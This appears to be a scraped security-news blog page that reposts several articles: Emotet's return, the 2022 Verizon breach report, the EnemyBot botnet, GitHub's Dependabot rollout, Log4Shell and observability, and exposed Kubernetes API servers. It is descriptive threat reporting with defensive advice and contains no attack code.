This is default featured slide 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured slide 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

Potent Emotet Variant Spreads Via Stolen Email Credentials

 

Description

Emotet’s resurgence in April seems to be the signal of a full comeback for what was once dubbed “the most dangerous malware in the world,” with researchers spotting various new malicious phishing campaigns using hijacked emails to spread new variants of the malware.

The “new and improved” version of Emotet is exhibiting a “troubling” behavior of effectively collecting and using stolen credentials, “which are then being weaponized to further distribute the Emotet binaries,” Charles Everette from Deep Instinct revealed in a blog post this week, citing research from HP Wolf Security’s latest threat insights blog.

“[Emotet] still utilizes many of the same attack vectors it has exploited in the past,” he wrote. “The issue is that these attacks are getting more sophisticated and are bypassing today’s standard security tools for detecting and filtering out these types of attacks.”

In April, Emotet malware attacks returned after a 10-month “spring break” with targeted phishing attacks linked to the threat actor known as TA542, which since 2014 has leveraged the Emotet malware with great success, according to a report by Proofpoint.

These attacks—which were being leveraged to deliver ransomware—came on the back of attacks in February and March hitting victims in Japan using hijacked email threads and then “using those accounts as a launch point to trick victims into enabling macros of attached malicious office documents,” Deep Instinct’s Everette wrote.

“Looking at the new threats coming from Emotet in 2022 we can see that there has been an almost 900 percent increase in the use of Microsoft Excel macros compared to what we observed in Q4 2021,” he wrote.

Emotet Rides Again

The attacks that followed in April targeted new regions beyond Japan and also demonstrated other characteristics signaling a ramp-up in activity and rise in sophistication of Emotet, Deep Instinct noted.

Emotet, like other threat groups, continues to leverage a more than 20-year-old Office bug that was patched in 2017, CVE-2017-11882, with nearly 20 percent of the samples that researchers observed exploiting this flaw. The Microsoft Office Memory corruption vulnerability allows an attacker to perform arbitrary code execution.

Nine percent of the new Emotet threats observed were never seen before, and 14 percent of the recent emails spreading the malware bypassed at least one email gateway security scanner before it was captured, according to Deep Instinct.

Emotet still primarily uses phishing campaigns with malicious attachments as its transportation of choice, with 45 percent of the malware detect using some type of Office attachment, according to Deep Instinct. Of these attachments, 33 percent were spreadsheets, 29 percent were executables and scripts, 22 percent were archives and 11 percent were documents.

Other notable changes to Emotet’s latest incarnation is its use of 64-bit shell code, as well as more advanced PowerShell and active scripts in attacks, according to Deep Instinct.

History of a Pervasive Threat

Emotet started its nefarious activity as a banking trojan in 2014, with its operators having the dubious honor of being one of the first criminal groups to provide malware-as-a-service (MaaS), Deep Instinct noted.

The trojan evolved over time to become a full-service threat-delivery mechanism, with the ability to install a collection of malware on victim machines, including information stealers, email harvesters, self-propagation mechanisms and ransomware. Indeed, Trickbot and the Ryuk and Conti ransomware groups have been habitual partners of Emotet, with the latter using the malware to gain initial entry onto targeted systems.

Emotet appeared to be put out of commission by an international law-enforcement collaborative takedown of a network of hundreds of botnet servers supporting the system in January 2021. But as often happens with cybercriminal groups, its operators have since regrouped and seem to be working once again at full power, researchers said.

In fact, in November 2021 when Emotet emerged again nearly a year after it went dark, it was on the back of its collaborator Trickbot. A team of researchers from Cryptolaemus, G DATA and AdvIntel separately observed the trojan launching a new loader for Emotet, signaling its return to the threat landscape.

3 Takeaways From the 2022 Verizon Data Breach Investigations Report

 

Description

3 Takeaways From the 2022 Verizon Data Breach Investigations Report

Sometimes, data surprises you. When it does, it can force you to rethink your assumptions and second-guess the way you look at the world. But other times, data can reaffirm your assumptions, giving you hard proof they’re the right ones — and providing increased motivation to act decisively based on that outlook.

The 2022 edition of Verizon’s Data Breach Investigations Report (DBIR), which looks at data from cybersecurity incidents that occurred in 2021, is a perfect example of this latter scenario. This year’s DBIR rings many of the same bells that have been resounding in the ears of security pros worldwide for the past 12 to 18 months — particularly, the threat of ransomware and the increasing relevance of complex supply chain attacks.

Here are our three big takeaways from the 2022 DBIR, and why we think they should have defenders doubling down on the big cybersecurity priorities of the current moment.

1. Ransomware’s rise is reaffirmed

In 2021, it was hard to find a cybersecurity headline that didn’t somehow pertain to ransomware. It impacted some 80% of businesses last year and threatened some of the institutions most critical to our society, from primary and secondary schools to hospitals.

This year’s DBIR confirms that ransomware is the critical threat that security pros and laypeople alike believe it to be. Ransomware-related breaches increased by 13% in 2021, the study found — that’s a greater increase than we saw in the past 5 years combined. In fact, nearly 50% of all system intrusion incidents — i.e., those involving a series of steps by which attackers infiltrate a company’s network or other systems — involved ransomware last year.

While the threat has massively increased, the top methods of ransomware delivery remain the ones we’re all familiar with: desktop sharing software, which accounted for 40% of incidents, and email at 35%, according to Verizon’s data. The growing ransomware threat may seem overwhelming, but the most important steps organizations can take to prevent these attacks remain the fundamentals: educating end users on how to spot phishing attempts and maintain security best practices, and equipping infosec teams with the tools needed to detect and respond to suspicious activity.

2. Attackers are eyeing the supply chain

In 2021 and 2022, we’ve been using the term “supply chain” more than we ever thought we would. COVID-induced disruptions in the flow of commodities and goods caused lumber to skyrocket and automakers to run short on microchips.

But security pros have had a slightly different sense of the term on their minds: the software supply chain. Breaches from Kaseya to SolarWinds — not to mention the Log4j vulnerability — reminded us all that vendors’ systems are just as likely a vector of attack as our own.

Unfortunately, Verizon’s Data Breach Investigations Report indicates these incidents are not isolated events — the software supply chain is, in fact, a major avenue of exploitation by attackers. In fact, 62% of cyberattacks that follow the system intrusion pattern began with the threat actors exploiting vulnerabilities in a partner’s systems, the study found.

Put another way: If you were targeted with a system intrusion attack last year, it was almost twice as likely that it began on a partner’s network than on your own.

While supply chain attacks still account for just under 10% of overall cybersecurity incidents, according to the Verizon data, the study authors point out that this vector continues to account for a considerable slice of all incidents each year. That means it’s critical for companies to keep an eye on both their own and their vendors’ security posture. This could include:

  • Demanding visibility into the components behind software vendors’ applications
  • Staying consistent with regular patching updates
  • Acting quickly to remediate and emergency-patch when the next major vulnerability that could affect high numbers of web applications rears its head

3. Mind the app

Between Log4Shell and Spring4Shell, the past 6 months have jolted developers and security pros alike to the realization that their web apps might contain vulnerable code. This proliferation of new avenues of exploitation is particularly concerning given just how commonly attackers target web apps.

Compromising a web application was far and away the top cyberattack vector in 2021, accounting for roughly 70% of security incidents, according to Verizon’s latest DBIR. Meanwhile, web servers themselves were the most commonly exploited asset type — they were involved in nearly 60% of documented breaches.

More than 80% of attacks targeting web apps involved the use of stolen credentials, emphasizing the importance of user awareness and strong authentication protocols at the endpoint level. That said, 30% of basic web application attacks did involve some form of exploited vulnerability — a percentage that should be cause for concern.

“While this 30% may not seem like an extremely high number, the targeting of mail servers using exploits has increased dramatically since last year, when it accounted for only 3% of the breaches,” the authors of the Verizon DBIR wrote.

That means vulnerability exploits accounted for a 10 times greater proportion of web application attacks in 2021 than they did in 2022, reinforcing the importance of being able to quickly and efficiently test your applications for the most common types of vulnerabilities that hackers take advantage of.

Stay the course

For those who’ve been tuned into the current cybersecurity landscape, the key themes of the 2022 Verizon DBIR will likely feel familiar — and with so many major breaches and vulnerabilities that claimed the industry’s attention in 2021, it would be surprising if there were any major curveballs we missed. But the key takeaways from the DBIR remain as critical as ever: Ransomware is a top-priority threat, software supply chains need greater security controls, and web applications remain a key attack vector.

If your go-forward cybersecurity plan reflects these trends, that means you’re on the right track. Now is the time to stick to that plan and ensure you have tools and tactics in place that let you focus on the alerts and vulnerabilities that matter most.

Additional reading:

NEVER MISS A BLOG

EnemyBot Malware Targets Web Servers, CMS Tools and Android OS

 

Description

A rapidly evolving IoT malware dubbed “EnemyBot” is targeting content management systems (CMS), web servers and Android devices. Threat actor group “Keksec” is believed behind the distribution of the malware, according to researchers.

“Services such as VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and more are being targeted as well as IoT and Android devices,” reported AT&T Alien labs in a recent post. “The malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities,” they added.

EnemyBot Working

The Alien lab research team study found four main sections of the malware.

The first section is a python script ‘cc7.py’, used to download all dependencies and compile the malware into different OS architectures (x86, ARM, macOS, OpenBSD, PowerPC, MIPS). After compilation, a batch file “update.sh” is created and used to spread the malware to vulnerable targets.

The second section is the main botnet source code, which includes all the other functionality of the malware excluding the main part and incorporates source codes of the various botnets that can combine to perform an attack.

The third module is obfuscation segment “hide.c” and is compiled and executed manually to encode /decode the malware strings. A simple swap table is used to hide strings and “each char is replaced with a corresponding char in the table” according to researchers.

The last segment includes a command-and-control (CC) component to receive vital actions and payloads from attackers.

AT&T researcher’s further analysis revealed a new scanner function to hunt vulnerable IP addresses and an “adb_infect” function that is used to attack Android devices.

ADB or Android Debug Bridge is a command-line tool that allows you to communicate with a device.

“In case an Android device is connected through USB, or Android emulator running on the machine, EnemyBot will try to infect it by executing shell command,” said the researcher.

“Keksec’s EnemyBot appears to be just starting to spread, however due to the authors’ rapid updates, this botnet has the potential to become a major threat for IoT devices and web servers,” the researchers added.

This Linux-based botnet EnemyBot was first discovered by Securonix in March 2022, and later in-depth analysis was done by Fortinet.

Vulnerabilities Currently Exploited by EnemyBot

The AT&T researchers release a list of vulnerabilities that are currently exploited by the Enemybot, some of them are not assigned a CVE yet.

The list includes Log4shell vulnerability (CVE-2021-44228, CVE-2021-45046), F5 BIG IP devices (CVE-2022-1388), and others. Some of the vulnerabilities were not assigned a CVE yet such as PHP Scriptcase and Adobe ColdFusion 11.

“This indicates that the Keksec group is well resourced and that the group has developed the malware to take advantage of vulnerabilities before they are patched, thus increasing the speed and scale at which it can spread,” the researcher explained.

Recommended Actions

The Alien lab researcher suggests methods to protect from the exploitation. Users are advised to use a properly configured firewall and focus on reducing Linux server and IOT devices’ exposure to the internet.

Another action recommended is to monitor the network traffic, scan the outbound ports and look for the suspicious bandwidth usage. Software should be updated automatically and patched with the latest security update.

EnemyBot Linux Botnet Now Exploits Web Server, Android and CMS Vulnerabilities

 

Description

A nascent Linux-based botnet named Enemybot has expanded its capabilities to include recently disclosed security vulnerabilities in its arsenal to target web servers, Android devices, and content management systems (CMS).

“The malware is rapidly adopting one-day vulnerabilities as part of its exploitation capabilities,” AT&T Alien Labs said in a technical write-up published last week. “Services such as VMware Workspace ONE, Adobe ColdFusion, WordPress, PHP Scriptcase and more are being targeted as well as IoT and Android devices.”

First disclosed by Securonix in March and later by Fortinet, Enemybot has been linked to a threat actor tracked as Keksec (aka Kek Security, Necro, and FreakOut), with early attacks targeting routers from Seowon Intech, D-Link, and iRZ.

Enemybot, which is capable of carrying out DDoS attacks, draws its origins from several other botnets like Mirai, Qbot, Zbot, Gafgyt, and LolFMe. An analysis of the latest variant reveals that it’s made up of four different components -

  • A Python module to download dependencies and compile the malware for different OS architectures
  • The core botnet section
  • An obfuscation segment designed to encode and decode the malware’s strings, and
  • A command-and-control functionality to receive attack commands and fetch additional payloads

“In case an Android device is connected through USB, or Android emulator running on the machine, EnemyBot will try to infect it by executing [a] shell command,” the researchers said, pointing to a new “adb_infect” function. ADB refers to Android Debug Bridge, a command-line utility used to communicate with an Android device.

Also incorporated is a new scanner function that’s engineered to search random IP addresses associated with public-facing assets for potential vulnerabilities, while also taking into account new bugs within days of them being publicly disclosed.

Besides the Log4Shell vulnerabilities that came to light in December 2021, this includes recently patched flaws in Razer Sila routers (no CVE), VMware Workspace ONE Access (CVE-2022-22954), and F5 BIG-IP (CVE-2022-1388) as well as weaknesses in WordPress plugins like Video Synchro PDF.

Other weaponized security shortcomings are below -

  • CVE-2022-22947 (CVSS score: 10.0) - A code injection vulnerability in Spring Cloud Gateway
  • CVE-2021-4039 (CVSS score: 9.8) - A command injection vulnerability in the web interface of the Zyxel NWA-1100-NH firmware
  • CVE-2022-25075 (CVSS score: 9.8) - A command injection vulnerability in TOTOLink A3000RU wireless router
  • CVE-2021-36356 (CVSS score: 9.8) - A remote code execution vulnerability in KRAMER VIAware
  • CVE-2021-35064 (CVSS score: 9.8) - A privilege escalation and command execution vulnerability in Kramer VIAWare
  • CVE-2020-7961 (CVSS score: 9.8) - A remote code execution vulnerability in Liferay Portal

What’s more, the botnet’s source code has been shared on GitHub, making it widely available to other threat actors. “I assume no responsibility for any damages caused by this program,” the project’s README file reads. “This is posted under Apache license and is also considered art.”

"Keksec’s Enemybot appears to be just starting to spread, however due to the authors’ rapid updates, this botnet has the potential to become a major threat for IoT devices and web servers,’’ the researchers said.

“This indicates that the Keksec group is well resourced and that the group has developed the malware to take advantage of vulnerabilities before they are patched, thus increasing the speed and scale at which it can spread.”

How we use Dependabot to secure GitHub

 

Description

At GitHub, we draw on our own experience using GitHub to build GitHub. As an example of this, we use a number of GitHub Advanced Security features internally. This post covers how we rolled out Dependabot internally to keep GitHub’s dependencies up to date. The rollout was managed by our Product Security Engineering Team who work with engineers throughout the entire development lifecycle to ensure that they’re confident in shipping new features and products. We’ll cover some background about how GitHub’s internal security teams think about security tooling in general, how we approached the Dependabot rollout, and how we integrated Dependabot into our existing engineering and security processes.

Keeping our dependencies up to date is one of the easiest ways to keep GitHub’s systems secure. The issue of supply chain security has become increasingly obvious in the past number of years, from the malicious flatmap-stream package, to the most recent log4shell vulnerabilities. Dependabot will alert developers when a repository is using a software dependency with a known vulnerability. By rolling out Dependabot internally to all of our repositories, we can measure, and significantly reduce, our usage of software dependencies with known vulnerabilities.

How we approach new tools and processes

Within Product Security Engineering, we spend a lot of time thinking about how new security tools and processes may impact the day-to-day work of our engineers. We use a number of guiding principles when evaluating tools and designing a rollout plan. For example, Does the security benefit of this new process outweigh the impact on engineering teams? How do we roll this out incrementally and gather feedback? What are our expectations for engineers, and how do we clearly communicate these expectations?

For Dependabot in particular, some of these questions were easy to answer. Dependabot is a native feature of GitHub, meaning, that it integrates with our engineers’ current workflows on GitHub.com. By better tracking the security of our software supply chain, we will keep GitHub and our users secure, which outweighs any potential impact on engineering teams.

We used a three-stage process to roll out Dependabot at GitHub: measure the current state of Dependabot alerts, a staged rollout to enable Dependabot incrementally over the organization, and finally, focus on remediating repositories with open Dependabot alerts.

Measurement

Our first aim was to accurately measure the current state of dependencies internally. We were not yet concerned with the state of any particular repository, but wanted to understand the general risk across the company. We did this by building internal tools to gather statistics about Dependabot alerts across the whole organization via the public GraphQL API. Getting this tooling in place early allowed us to gather metrics continuously and understand the general trends within GitHub before, during, and after the rollout.

Dependabot, like other GitHub Advanced Security features, can be enabled for all repositories within an organization from the organization’s administration page. However, GitHub has several thousand repositories internally, and we were aware that enabling Dependabot organization-wide could have a large impact on teams. We mitigated this impact in two ways: a staged rollout and frequent company-wide communications.

Rollout

A staged rollout allowed us to gather feedback from an initial set of repository owners before proceeding with the organization-wide rollout. We use this approach internally for security tools within GitHub, as we believe that unshipping a new tool or process can cause even more confusion across the company. For Dependabot, we decided on enabling the feature initially on a subset of our most active repositories to ensure that we could gather useful feedback. We then expanded it to a larger subset, before finally enabling the feature organization wide.

As a heavily-distributed company working asynchronously across multiple timezones, we used a mixture of GitHub Issues and GitHub Discussions to share new tools and processes with engineers. We aimed to answer, clearly and succinctly, the most important questions in our communications: What are we doing? Why are we doing this? When are we doing this? Lastly, what do I need to do? The last question was key. We made it clear that we were rolling out Dependabot organization-wide to understand our current risk and that, while we encourage repository owners to upgrade dependencies, we were not expecting every Dependabot alert to be fixed right away.

We also used these discussions as a touchpoint for other related tasks, such as encouraging teams to archive repositories if they are no longer in use. In organizations, there are always early adopters of new tools and features. Although we clearly laid out our incremental rollout plan, we also encouraged teams to enable Dependabot right away if it made sense for their repositories.

All in all, we made the initial ship to 200 repositories, followed up in 30 days with another 1,000 repositories, and enabled it organization-wide at the 45-day point from our initial ship. After enabling it organization-wide, we also used the "Automatically enabled for new repositories" feature to ensure that new repositories are following best practices by default.

Remediation

Once we had Dependabot enabled for all GitHub repositories, we could measure the general trend of Dependabot alerts across the company. Using our tooling, we could see that the general trend of Dependabot alerts across the company was broadly flat. We now switched our focus from measuring the current state to working with repository owners to upgrade our dependencies.

We managed this process through GitHub’s internal Service Catalog tool. This is the single source of truth within GitHub for services running inside GitHub and defines where a service is deployed, who owns the service, and how to contact them. The s_ervice_ concept is an abstraction over repositories. The Service Catalog only tracks repositories that are currently deployed inside GitHub, which is a small subset of repositories. By leveraging the Service Catalog, we could ensure that we focused our remediation efforts on repositories that are running in production, where a vulnerable dependency could present a risk to GitHub and our users.

Each service can have domain-specific metrics associated with them, and we built tooling to continuously pull Dependabot data via the GitHub REST API and upload it to the Service Catalog:

The Service Catalog allows us to assign service level objectives (SLOs) to individual metrics. We acknowledge that not all Dependabot alerts can be actioned immediately. Instead, we assign a realistic grace period for service owners to remediate Dependabot alerts before marking a metric as failing.

At this point, the Service Catalog metrics showed that around one-third of services had Dependabot alerts that needed remediation. We then needed a process for prioritizing and managing the work of upgrading dependencies across the company. We decided to integrate with GitHub’s internal Engineering Fundamentals program. This takes a company-wide view of the various metrics in the Service Catalog that we consider the baseline for well-maintained, available, and secure services.

The program is all about prioritization: given the current set of services not meeting baseline expectations, what is the priority for service owners right now? By integrating Dependabot alerts into the program, it allows us to clearly communicate the priority of dependency upgrades against other foundational work. This also drove conversations around deprecation. Like all companies, we had a number of internal services that were currently, or soon to be, deprecated. By making these metrics clearly visible, it allowed us to quantify the risk of keeping these deprecated services running in production and led to service owners reprioritizing the work to fully shut down those services.

The cornerstone of GitHub’s Engineering Fundamentals program is a monthly synchronous meeting with engineering leadership and service owners. Every month, we define realistic goals for service owners to achieve in the next four weeks then review the progress against those goals. This allowed us to break down the nebulous task—fixing all open Dependabot alerts—into a clear set of tasks over a series of months. After integrating the Dependabot metrics with the program, we then made it a focus for engineering teams for a whole quarter of the year, which allowed us to build momentum on upgrading dependencies for services.

Outcomes

Our focus on Dependabot alerts was a success. By leveraging the Engineering Fundamentals program, we increased the percentage of services with zero Dependabot alerts from 68% up to 81%. This represents roughly 50 core GitHub services remediated in just three months, including several services performing large Rails upgrades to ensure they are using the most recent version. As the Engineering Fundamentals program runs continuously, this was not a one-off piece of work. Rather, the program allows us to follow the Dependabot alert metrics over time and intervene if we see them trending in the wrong direction.

After trialing this approach with Dependabot, we have since incorporated other GitHub Advanced Security tools and features, such as CodeQL into our Engineering Fundamentals program. By integrating more sources of security alerts, GitHub now has a more complete picture of the state of services across the company, which allows us to clearly prioritize work.

As an internal security team, GitHub’s Product Security Engineering Team faces many of the same challenges as our GitHub Enterprise users, and we use our experience to inform the design of GitHub features. Our emphasis on organization-wide metrics was a key part of measuring progress on this piece of work. That feedback has informed how we designed the Security Overview feature, which allows GitHub Enterprise users to easily see the current state of GitHub Advanced Security alerts across their organization.

Are you inspired to work at GitHub?

  • Dedicated remote-first company with flexible hours
  • Building great products used by tens of millions of people and companies around the world
  • Committed to nurturing a diverse and inclusive workplace
  • And so much more!

Closing the Gap Between Application Security and Observability

 

Description

Daniel Kaar, global director application security engineering at Dynatrace

Infosec Insiders columnist Daniel Kaar, global director application security engineering at Dynatrace.

When it’s all said and done, application security pros may come to look upon the Log4Shell vulnerability as a gift. ** **

Potentially one of the most devastating software flaws ever found, Log4Shell has justified scrutiny of modern security methods. It also turns out too many people continue to think about security strictly in terms of fortifying network perimeters.

But in the still burgeoning age of cloud computing, Log4Shell also exposed the significant gap that exists between application security and observability. It’s still not widely known that observability makes systems safer.

Nearly six months after the emergency of Log4Shell, the large number of companies still suffering the effects is proof. It comes down to this: Insufficient vulnerability management and a lack of visibility has hobbled efforts to identify and patch third-party software and development environments.

As a result, millions of apps remain at risk. Analysts predict that Log4Shell fallout will linger for years.

Protection means securing complex, distributed and high-velocity cloud architectures. Achieving this requires companies to adopt a modern development stack, one that arms security managers with greater observability and superior vulnerability management.

Traditional Application Security Tools Leave Too Many Questions

Analysts and journalists have described Log4Shell — the software vulnerability in Apache Log4j 2 discovered in November 2021 — as potentially one of the most devastating vulnerabilities ever found. Some security experts said the software flaw “bordered on the apocalyptic.”

Lest we forget: The security industry isn’t in trouble because of any single vulnerability. That became clear in March, with the emergence of Spring4Shell, a critical vulnerability targeting Java’s popular Spring open-source framework.

Companies struggle to identify vulnerabilities because traditional detection methods are too plodding, inefficient, and leave too many unanswered questions. In the past, security teams performed a static analysis known as software composition analysis (SCA) on code libraries to determine whether a vulnerability had affected their systems.

An SCA relies on scanning tools and manual procedures. Though they’re often effective, these methods are designed to identify vulnerabilities early in the development lifecycle — not uncovering vulnerabilities in code already in production.

In addition, SCA tools are also known to produce numerous false positives; they don’t provide vital detail, such as the potential impact of the vulnerability occurrences or whether the threatened repository is in production or in a pre-production environment.

They also don’t provide much insight into which areas are most at risk or should be prioritized.

Application Security-enabled Observability in Hours, Not Months

The good news is that when Log4Shell struck, some security managers were prepared. Some, including Jeroen Veldhorst, chief technology officer at Avisi, a Netherlands-based software development and cloud service company, had adopted a modern cloud observability platform.

According to Veldhorst, the application security and observability solution deployed by Avisi automatically identified and provided an overview of Log4Shell-vulnerable systems in Avisi’s production environment, Veldhorst said. The tool performed another automated and important task: providing the Avisi team with a list of systems to remediate first.

In the past, following the discovery of a new vulnerability, Veldhorst’s team would spend precious time patching low-priority occurrences. They were essentially guessing. Occasionally, the affected library his team labored on wasn’t even in production.

“Since [the tool] scans our platform continuously, it could tell us if there was a vulnerability [in production],” Veldhorst said.

Avisi’s observability and application security tool enabled the security team to accelerate the response to Log4Shell. Instead of spending days, weeks, or even months trying to resolve the issue via traditional methods, Avisi managed to resolve Log4Shell instances on all its systems within hours.

Combining observability and application security capabilities enables companies to reduce time spent resolving the last attack and more time preparing to thwart the next one.

For companies wishing to obtain an effective and mature observability platform, they must ensure that any upgrade comes with three integral components:

Vulnerability Detection and Mitigation

  • Application security platforms should automatically provide a prioritized list of potentially affected systems, the degree of exposure, and provide the ability for teams to perform direct remediation. Also, an application security remediation tracking screen for each vulnerability helps security teams spot and highlight whether each affected process still has a vulnerability loaded. Once each instance is resolved, observability-enabled application security tools automatically close the vulnerability report and then reopens it if a new instance of the problem is detected.

Incident Detection and Response

  • Application security and observability capabilities can be used to set up Log4Shell-specific attack monitoring and incident detection. This quickly identifies Log4Shell log patterns, and with the help of platform log analytics and alerting capabilities, teams can configure alerting mechanisms for attacks on their environments. Metrics and alerting systems also enable visibility into underlying code to quickly set up a dedicated alerting mechanism for any potential successful attacks on this critical vulnerability.

Coordination and Communication

  • The chief information security officer, the security team, engineering teams, and customer support teams can use application security and observability platforms to set up multiple daily status updates until all systems have been patched against a major vulnerability. This enables swift coordination against and mitigation of potential risks to environments and clear communication to customers.

Although only a small number of vendors can supply the entire list, these tools and the added security they provide mean they’re worth finding.

Through the continuous surveillance of an organization’s production environments, the appropriate AppSec tools can enable security teams to detect vulnerabilities such as Log4Shell and Spring4Shell in real-time and implement immediate remediation at scale.

380K Kubernetes API Servers Exposed to Public Internet

 

Description

More than 380,000 Kubernetes API servers allow some kind of access to the public internet, making the popular open-source container-orchestration engine for managing cloud deployments an easy target and broad attack surface for threat actors, researchers have found.

The Shadowserver Foundation discovered the access when it scanned the internet for Kubernetes API servers, of which there are more than 450,000, according to a blog post published this week.

Of the more than 450,000 Kubernetes API instances identified by Shadowserver, 381,645 responded with “200 OK,” researchers said. In all, Shadowserver found 454,729 Kubernetes API servers. The “open” API instances thus constitute nearly 84 percent of all instances that that Shadowserver scanned.

Moreover, most of the accessible Kubernetes servers—201,348, or nearly 53 percent–were found in the United States, according to the post.

While this response to the scan does not mean these servers are fully open or vulnerable to attacks, it does create a scenario in which the servers have an “unnecessarily exposed attack surface,” according to the post.

“This level of access was likely not intended,” researchers observed. The exposure also allows for information leakage on version and builds, they added.

Cloud Under Attack

The findings are troubling given that attackers already increasingly have been targeting Kubernetes cloud clusters as well as using them to launch other attacks against cloud services. Indeed, the cloud historically has suffered from rampant misconfiguration that continues to plague deployments, with Kubernetes being no exception.

In fact, Erfan Shadabi, cybersecurity expert with data-security firm comforte AG, said in an email to Threatpost that he was not surprised that the Shadowserver scan turned up so many Kubernetes servers exposed to the public internet.

“White [Kubernetes] provides massive benefits to enterprises for agile app delivery, there are a few characteristics that make it an ideal attack target for exploitation,” he said. “For instance, as a result of having many containers, Kubernetes has a large attack surface that could be exploited if not pre-emptively secured.”

Open-Source Security Exposed

The findings also raise the perennial issue of how to build security into open-source systems that become ubiquitous as part of modern internet and cloud-based infrastructure, making an attack on them an attack on the myriad systems to which they are connected.

This issue was highlighted all-too-unfortunately in the case of the Log4Shell vulnerability in the ubiquitous Java logging library Apache Log4j that was discovered last December.

The flaw, which is easily exploitable and can allow unauthenticated remote code execution (RCE) and complete server takeover–continues to be targeted by attackers. In fact, a recent report finding millions of Java applications still vulnerable despite a patch being available for Log4Shell.

An Achilles heel in particular of Kubernetes is that the data-security capabilities built into the platform are only at a “bare minimum”–protecting data at rest and data in motion, Shadabi said. In a cloud environment, this is a dangerous prospect.

“There’s no persistent protection of data itself, for example using industry accepted techniques like field-level tokenization,” he observed. “So if an ecosystem is compromised, it’s only a matter of time before the sensitive data being processed by it succumbs to a more insidious attack.”

Shadabi’s advice to organizations that use containers and Kubernetes in their production environments is to take securing Kubernetes as seriously as they do all aspects of their IT infrastructure, he said.

For its part, Shadowserver recommended that if administrators find that a Kubernetes instance in their environment is accessible to the internet, they should consider implementing authorization for access or block at the firewall level to reduce the exposed attack surface.